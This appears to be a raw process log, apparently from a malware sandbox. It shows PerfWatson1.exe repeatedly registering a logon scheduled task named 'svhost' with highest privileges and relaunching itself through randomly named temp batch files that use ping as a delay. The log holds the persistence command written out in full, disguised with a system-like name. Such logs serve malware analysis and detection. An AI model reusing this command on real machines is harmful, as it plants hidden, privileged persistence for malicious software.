"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSS5rvdHHUg7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HOjTmXfky7zS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P46oJqKvEUuL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uM3DIavRGUUm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MTrnWyhLZ4vu.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oywZ1RjYJL2A.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lP0orEwl6YvE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7MwdS0Tay599.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RgeIEF7Q8B77.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bv2QoIJkJ2lv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DJLmcAudmnxS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y6JqB1ZW4QlC.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oheNI52vPxpY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\engfbP3sWEP9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4IqHJVBZHywJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hB4rphTfmte1.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6m5RfUXaVESo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Is8qQeJEEeAb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U8BzXMUL4x7I.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIkplOsNyMEl.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeCcyPqutaTw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUQV0YNToSBc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t8hnzcvOqgaP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PBHsljoLLEDJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Mh64sxZtnZBA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rBIRJ2YTqXdn.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bDTxL2S3Odte.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cH5vOKER0g2y.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1RnGu1TtyRdM.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOwLDwt6WODa.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G3zlOQWtkrBs.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M1BpzeMNynyw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIpWins6vVZi.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uvybXM0ioytF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RtX5ckhvibod.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\25pVBqU0VBYr.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3Ri70JIiGVo2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qT2tg58XwItx.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUZEhiYOZj5W.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKOyZgHf6T0N.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QrUEsH0T39rs.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\W13JHBJ2rYvd.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ibSdvkPJDENX.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rn6eFfHf11fk.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5I5rO2RFPSVm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LNKjWBcil6ZF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3E1ZHSPPqiIp.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ilY1Zc1P5Vmt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rJDqAp9vySsW.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kYWV89qnJkUD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
